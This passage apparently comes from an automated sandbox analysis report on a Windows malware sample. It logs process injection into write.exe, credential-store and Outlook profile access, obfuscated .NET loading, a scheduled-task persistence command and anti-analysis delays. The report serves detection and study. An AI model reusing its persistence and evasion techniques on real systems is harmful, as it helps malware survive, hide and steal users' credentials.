            Source: C:\Windows\SysWOW64\write.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\CFV20240600121.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: CFV20240600121.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: CFV20240600121.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: write.pdbGCTL source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308515930.000000000087E000.00000002.00000001.01000000.0000000D.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451569346.000000000087E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CFV20240600121.exe, CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: CFV20240600121.exe, OnelookerForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: BPSHhDGmARC.exe.0.dr, OnelookerForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.7990000.6.raw.unpack, LoginForm.cs .Net Code: _200F_202B_200C_202E_206F_202B_206C_200F_206E_202B_200F_200B_206C_200D_200E_200B_206C_206F_200C_206B_206A_206E_202A_206C_206C_206B_202E_202A_206D_206C_206D_206D_206F_200B_202A_206C_200C_206E_202D_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.41d9970.4.raw.unpack, LoginForm.cs .Net Code: _200F_202B_200C_202E_206F_202B_206C_200F_206E_202B_200F_200B_206C_200D_200E_200B_206C_206F_200C_206B_206A_206E_202A_206C_206C_206B_202E_202A_206D_206C_206D_206D_206F_200B_202A_206C_200C_206E_202D_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.cs .Net Code: Yr4ZhY7ma0ZV4nWo6Pb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.cs .Net Code: Yr4ZhY7ma0ZV4nWo6Pb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.cs .Net Code: Yr4ZhY7ma0ZV4nWo6Pb System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 0_2_05809040 pushad ; retf 0_2_0580904E
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 0_2_077D864B push eax; retf 0_2_077D8651
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 0_2_077DBD0A push es; ret 0_2_077DBDB0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_00403350 push eax; ret 12_2_00403352
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_00401CCB push 0000006Bh; iretd 12_2_00401D84
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_00401CD0 push 0000006Bh; iretd 12_2_00401D84
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_0040C4B4 push cs; retf 002Ah 12_2_0040C4B8
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_0040851A push cs; retf 12_2_0040851D
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_0040853C push 00000009h; retf 12_2_0040853E
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_00413623 pushad ; ret 12_2_0041364E
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_00417F3D pushfd ; retf 12_2_00417F3F
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_013A225F pushad ; ret 12_2_013A27F9
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_013A27FA pushad ; ret 12_2_013A27F9
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_013D09AD push ecx; mov dword ptr [esp], ecx 12_2_013D09B6
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_013A283D push eax; iretd 12_2_013A2858
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 13_2_0729864B push eax; retf 13_2_07298651
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_0119C54D pushfd ; ret 18_2_0119C54E
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_0119C54F push 8B011267h; ret 18_2_0119C554
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_011509AD push ecx; mov dword ptr [esp], ecx 18_2_011509B6
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_0119C9D7 push edi; ret 18_2_0119C9D9
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_01121366 push eax; iretd 18_2_01121369
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_01121FEC push eax; iretd 18_2_01121FED
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_011A7E99 push ecx; ret 18_2_011A7EAC
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Code function: 18_2_0042CDC5 pushfd ; iretd 18_2_0042CDC8
            Source: CFV20240600121.exe Static PE information: section name: .text entropy: 7.968738777305981
            Source: BPSHhDGmARC.exe.0.dr Static PE information: section name: .text entropy: 7.968738777305981
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack: High entropy of concatenated method names
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack: High entropy of concatenated method names
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack: High entropy of concatenated method names
            Source: C:\Users\user\Desktop\CFV20240600121.exe File created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe

            Boot Survival

            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: CFV20240600121.exe PID: 5640, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: BPSHhDGmARC.exe PID: 1288, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\write.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: 31D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: 51D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: 7BF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: 8BF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: 8D90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: 9D90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: A460000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: B460000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: C460000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: DB0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 28B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 27B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 7310000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 8310000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 84B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 94B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory allocated: 9A50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_0141096E rdtsc 12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4992
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4574
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 405
            Source: C:\Windows\SysWOW64\write.exe Window / User API: threadDelayed 4705
            Source: C:\Windows\SysWOW64\write.exe Window / User API: threadDelayed 5267
            Source: C:\Users\user\Desktop\CFV20240600121.exe API coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe API coverage: 0.2 %
            Source: C:\Users\user\Desktop\CFV20240600121.exe TID: 1124 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1644 Thread sleep count: 4992 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2952 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4696 Thread sleep count: 237 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe TID: 7204 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe TID: 7616 Thread sleep count: 4705 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 7616 Thread sleep time: -9410000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe TID: 7616 Thread sleep count: 5267 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 7616 Thread sleep time: -10534000s >= -30000s
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648 Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648 Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe TID: 7648 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CFV20240600121.exe, Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\CFV20240600121.exe, Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\write.exe, Process queried: DebugPort
            Source: C:\Users\user\Desktop\CFV20240600121.exe, Code function: 12_2_00417633 LdrLoadDll, 12_2_00417633
            Source: C:\Users\user\Desktop\CFV20240600121.exe, Code function: 12_2_01464144 mov eax, dword ptr fs:[00000030h], 12_2_01464144
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA2C3 mov eax, dword ptr fs:[00000030h]12_2_013DA2C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE53E mov eax, dword ptr fs:[00000030h]12_2_013FE53E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0535 mov eax, dword ptr fs:[00000030h]12_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140656A mov eax, dword ptr fs:[00000030h]12_2_0140656A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140656A mov eax, dword ptr fs:[00000030h]12_2_0140656A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140656A mov eax, dword ptr fs:[00000030h]12_2_0140656A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466500 mov eax, dword ptr fs:[00000030h]12_2_01466500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4500 mov eax, dword ptr fs:[00000030h]12_2_014A4500
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8550 mov eax, dword ptr fs:[00000030h]12_2_013D8550
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8550 mov eax, dword ptr fs:[00000030h]12_2_013D8550
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F45B1 mov eax, dword ptr fs:[00000030h]12_2_013F45B1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F45B1 mov eax, dword ptr fs:[00000030h]12_2_013F45B1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E5CF mov eax, dword ptr fs:[00000030h]12_2_0140E5CF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E5CF mov eax, dword ptr fs:[00000030h]12_2_0140E5CF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A5D0 mov eax, dword ptr fs:[00000030h]12_2_0140A5D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A5D0 mov eax, dword ptr fs:[00000030h]12_2_0140A5D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C5ED mov eax, dword ptr fs:[00000030h]12_2_0140C5ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C5ED mov eax, dword ptr fs:[00000030h]12_2_0140C5ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D2582 mov eax, dword ptr fs:[00000030h]12_2_013D2582
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D2582 mov ecx, dword ptr fs:[00000030h]12_2_013D2582
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01404588 mov eax, dword ptr fs:[00000030h]12_2_01404588
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
